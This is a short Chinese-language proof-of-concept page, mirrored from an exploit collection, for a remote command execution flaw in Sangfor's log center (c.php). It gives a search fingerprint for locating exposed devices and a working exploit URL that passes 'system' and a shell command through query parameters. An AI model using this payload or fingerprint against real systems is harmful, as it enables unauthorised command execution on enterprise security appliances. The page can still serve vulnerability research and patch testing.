mirror of
https://github.com/Threekiii/Awesome-POC.git
synced 2025-11-07 11:58:05 +00:00
39 lines
506 B
Markdown
39 lines
506 B
Markdown
# 深信服 日志中心 c.php 远程命令执行漏洞
|
||
|
||
## 漏洞描述
|
||
|
||
深信服 日志中心 c.php 远程命令执行漏洞,使用与EDR相同模板和部分文件导致命令执行
|
||
|
||
## 漏洞影响
|
||
|
||
```
|
||
深信服 日志中心
|
||
```
|
||
|
||
## 网络测绘
|
||
|
||
```
|
||
body="isHighPerformance : !!SFIsHighPerformance,"
|
||
```
|
||
|
||
## 漏洞复现
|
||
|
||
登录页面如下
|
||
|
||
|
||
|
||

|
||
|
||
|
||
|
||
访问漏洞Url
|
||
|
||
|
||
|
||
```plain
|
||
/tool/log/c.php?strip_slashes=system&host=ipconfig
|
||
```
|
||
|
||
|
||
|
||
 |